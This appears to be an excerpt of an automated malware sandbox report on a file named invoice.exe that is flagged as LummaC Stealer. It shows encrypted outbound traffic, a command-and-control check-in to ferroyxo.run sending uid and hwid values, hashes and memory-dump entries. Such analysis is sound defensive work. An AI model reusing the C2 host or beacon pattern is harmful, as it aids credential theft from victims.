                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 9f c8 97 a1 91 38 ad 7c 65 20 77 be 9e 6e d6 f1 e4 2f 77 dc 25 3c 93 a4 5e a0 da 8c cb 9f 97 d8 fe 9f 95 5f ef c0 5f 00 27 7e fd e7 ac d8 37 26 89 e8 f6 59 ef c0 09 15 8b d5 a5 8a 1d 3c 37 f7 e0 b9 d6 d4 24 e5 ba f9 9d 07 5c 35 c9 92 3f 04 83 e6 e8 48 b6 9d 39 cd c4 35 a9 c2 61 43 f4 37 4c 9c c8 0b 5a 12 aa be 6b 6d 82 8a 31 72 b9 dd 26 52 36 a3 f3 a0 3a e8 a4 e7 b7 53 d5 ee 60 b6 75 2c 93 97 a4 8e d0 50 f3 6c 8b 16 f4 41 a2 1c 8f 93 99 7f 63 a3 9f a9 a9 53 3e c4 28 f5 6e 14 10 46 0d 69 68 e0 14 5b d0 ac 8c 11 b4 46 74 f6 83 0c 96 de 95 a7 e3 11 55 e9 09 d9 87 a5 0c e3 bb 1f 1d fc 43 c6 2c 2f 41 69 e0 fe e9 ca 6f af d2 14 50 c6 56 87 4d 98 92 dd 20 8b b5 4e 8a b6 11 49 0d 69 db f0 64 91 de f7 1b a6 91 77 69 c1 4d e5 93 ea 6a b4 33 ae a5 e5 0c 5a d5 51 fa
                                                                        Data Ascii: 8|e wn/w%<^__'~7&Y<7$\5?H95aC7LZkm1r&R6:S`u,PlAcS>(nFih[FtUC,/AioPVM NIidwiMj3ZQ
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 66 ad 97 5c a1 60 42 3d 21 ab dc c1 7f 14 55 30 b2 2c 2c 5f 1e 09 2e b0 78 2b 5c e6 d3 50 8d 84 88 9f e8 1b 8c 2f a6 d6 19 fb 08 29 8f e2 e5 39 89 da 29 8a 38 1b f6 77 e4 89 1c 0d 1e 2b f6 7a 01 88 38 1c 35 14 9e c5 db a5 57 6c e6 75 4e 81 64 06 20 70 69 e3 97 a2 98 77 9e 71 ed 8d af 0f 85 0e 5f ae 61 ba 01 55 d2 4a 42 8c 49 ac c4 8e 1d 40 36 d9 ea b3 9c d4 bd 6c 01 a0 3e 89 b2 c3 74 8b 2b 3b 52 1e a0 a0 e3 b2 04 52 c7 e8 1f 92 1e b4 d6 35 9c d5 86 01 40 6d 63 ea b3 a5 c0 8d 40 a0 7d 43 52 5d 4a 1e e9 74 cd 3f 4a aa c7 9b df 6e 5d c0 64 83 1c 5f f6 d6 a7 e8 08 a7 00 37 83 69 66 b0 53 40 61 e6 7a 99 6c 50 42 ba d7 33 dd 88 6e 9e 06 52 e7 18 6c 32 bf 52 93 39 28 f5 6a c9 52 74 0b aa 2a 44 44 0f c0 2a aa 84 f4 bc 08 64 1d b8 0e 1e 37 76 02 29 8a 77 ca 69 12
                                                                        Data Ascii: f\`B=!U0,,_.x+\P/)9)8w+z85WluNd piwq_aUJBI@6l>t+;RR5@mc@}CR]Jt?Jn]d_7ifS@azlPB3nRl2R9(jRt*DD*d7v)wi
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 22 12 5c 38 2e 9a 92 05 7b d6 04 c1 25 68 3f 6f 92 89 ff d3 64 ad b7 8f 5a 66 bd 6c 2c 1a 1e 00 a6 27 5c 0b bc 23 41 01 19 1b df b1 ad 79 07 27 c4 d6 2a c8 5b 5b 52 0a 4a c0 4b 6a de 7b 24 15 14 da cd 2d 3d 2c 41 83 0c c4 ad ec b1 6b b6 4b 91 71 a2 3f a3 83 3d a4 e4 44 b4 37 39 8b d8 e3 a9 97 86 b3 20 95 50 f5 78 4e d7 a1 90 8a 02 90 2f db 0e e8 41 38 3a ce 5b 43 f5 e1 32 c9 25 7a fb de b5 ff 64 4d cb 2d 9b 39 d3 2d 0f dd da 98 9b 4e d3 ab 65 a4 6f 30 3d 3b 21 db e1 86 fb 25 1e 40 a9 33 d2 e1 cd 56 ea 9a 6e 60 39 1e 5c 97 b8 e5 05 b6 96 c7 70 b2 55 91 7c 0b 14 d9 a4 31 12 e2 3b 5d a6 aa d2 81 0c 5d d6 57 24 b9 e5 72 48 bb a4 c4 f5 7e ba f4 a2 c2 04 1a bb 6c 66 45 05 4e e3 8a 50 67 31 79 89 2e b0 d0 ba 37 4d d7 b1 fa b2 6c 90 24 2b 68 80 6f ca a1 f4 dc 95
                                                                        Data Ascii: "\8.{%h?odZfl,'\#Ay'*[[RJKj{$-=,AkKq?=D79 PxN/A8:[C2%zdM-9-Neo0=;!%@3Vn`9\pU|1;]]W$rH~lfENPg1y.7Ml$+ho
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: bc d5 01 d6 96 56 74 77 22 74 b1 bf d7 6d b5 47 a1 0e 10 0e bb 9e 9e 38 9e 67 cc ee ce 94 ac 14 32 44 e9 a3 f0 79 77 38 b7 47 4d dd 33 40 0f 07 f2 a2 35 dd b9 7c af 64 34 7f ad 06 cd 79 fd 4e 3a 19 ea e6 c2 49 1e 98 f6 0f af 22 69 62 80 55 f0 73 aa 5a f8 94 68 a7 fe 78 d5 3e c3 70 b8 0b 4d 67 64 72 77 7c e5 8d 1e 84 79 28 5b b4 65 13 90 57 62 7e 08 94 b1 1d f7 0e 9e 75 4d e6 20 38 f3 df 32 b1 f2 56 96 da f7 a4 3b e5 b8 ff 7a b8 f1 2e 36 c1 29 68 a0 fc 15 cc 23 e8 a5 e5 5f 36 8c 7e 79 ed 93 63 df 53 ad 02 07 b1 a8 6b 84 ca 94 f3 08 62 8d 1f 91 de 5b 18 3c 4c 53 11 b1 92 4a 5e 85 ab 10 72 4d 32 e4 6c b5 da f0 a4 70 e7 05 92 0d 56 87 3d ff 27 54 e3 7a 12 3c 7b 83 a6 ed 7b 91 8f 6d 67 c5 a0 9b d1 0e bc fe c5 2d 80 a1 57 39 48 ff 75 b4 75 c5 87 37 58 df 8a cf
                                                                        Data Ascii: Vtw"tmG8g2Dyw8GM3@5|d4yN:I"ibUsZhx>pMgdrw|y([eWb~uM 82V;z.6)h#_6~ycSkb[<LSJ^rM2lpV='Tz<{{mg-W9Huu7X
                                                                        2025-04-02 09:42:53 UTC264INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:53 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        Vary: Accept-Encoding
                                                                        Cf-Cache-Status: DYNAMIC
                                                                        CF-RAY: 929f60f20f9d20f8-EWR
                                                                        alt-svc: h3=":443"; ma=86400


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                        6          | 192.168.2.7 | 49687       | 172.67.131.170 | 443              | 6892 | C:\Users\user\Desktop\invoice.exe

                                                                        Timestamp               | Bytes transferred | Direction | Data
                                                                        2025-04-02 09:42:54 UTC | 263               | OUT       | POST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 89
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:54 UTC | 89                | OUT       | Data Raw: 75 69 64 3d 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 26 63 69 64 3d 26 68 77 69 64 3d 34 44 46 43 32 30 34 44 46 30 44 39 32 36 38 44 46 33 45 39 36 42 31 41 32 43 32 42 39 33 46 37
                                                                        Data Ascii: uid=e91dba334d13b3862d5fcf1c07f54f82f2e4b89799&cid=&hwid=4DFC204DF0D9268DF3E96B1A2C2B93F7
                                                                        2025-04-02 09:42:54 UTC | 241               | IN        | HTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:54 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 43
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        Cf-Cache-Status: DYNAMIC
                                                                        CF-RAY: 929f60fdba951839-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-04-02 09:42:54 UTC | 43                | IN        | Data Raw: 62 ff 6f f2 84 14 98 9d 61 cd 66 3a 31 10 76 93 be d3 00 65 dc 40 f1 da 7a 72 37 59 7e ff 6c 52 69 e8 8e 16 24 d1 53 20 9e a9 05
                                                                        Data Ascii: boaf:1ve@zr7Y~lRi$S



                                                                        Target ID:0
                                                                        Start time:05:42:41
                                                                        Start date:02/04/2025
                                                                        Path:C:\Users\user\Desktop\invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\invoice.exe"
                                                                        Imagebase:0x300000
                                                                        File size:845'824 bytes
                                                                        MD5 hash:57BCB61167ABD03D9D98705AB39E79AB
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Non-executed Functions

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.973091706.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Offset: 00842000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_842000_invoice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .COM$C:\U
                                                                        • API String ID: 0-2478718401
                                                                        • Opcode ID: f9526cffd469c7da0b387d1e40664bbd004d271562f574e3d0529928e5da0a84
                                                                        • Instruction ID: e1402fdccab04c350a9d5da76ee4b3206753b5fcf4d9cfd10928e097d5b11f90
                                                                        • Opcode Fuzzy Hash: f9526cffd469c7da0b387d1e40664bbd004d271562f574e3d0529928e5da0a84
                                                                        • Instruction Fuzzy Hash: D1B10C6284E3C54FE717877448796A5BFB0AE2721871E86EFC0C1CF4A3E649484AD763
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.965445711.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, Offset: 007DC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_7dc000_invoice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e2b4c9d924f7ba0567a2e5b83c09d9e8ec1c061f0fee0df46bce4283bb41a3b
                                                                        • Instruction ID: 2b2186dc6d314be66b2bd330e501ede591a9d3e95a6257d21ca030b3b3e23e53
                                                                        • Opcode Fuzzy Hash: 7e2b4c9d924f7ba0567a2e5b83c09d9e8ec1c061f0fee0df46bce4283bb41a3b
                                                                        • Instruction Fuzzy Hash: 2642316280FBC94FDB1787724C69591BF706E2B21975E86DFC4C18F0A3E24D884AC766
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.965445711.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, Offset: 007DC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_7dc000_invoice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af409577ee6589cb822822d629760c3d3a087d8672c28244692cb46bbb1b6d4e
                                                                        • Instruction ID: 4bbe302d5089a8ec1b5e65de691188a48a57c7e7389ba80a6bbbbb2d8697e989
                                                                        • Opcode Fuzzy Hash: af409577ee6589cb822822d629760c3d3a087d8672c28244692cb46bbb1b6d4e
                                                                        • Instruction Fuzzy Hash: 97A1865684E3C14FDB1B8B714DB9691BF70AE2720471E8ACBC8C5CE4A7E24D580AD323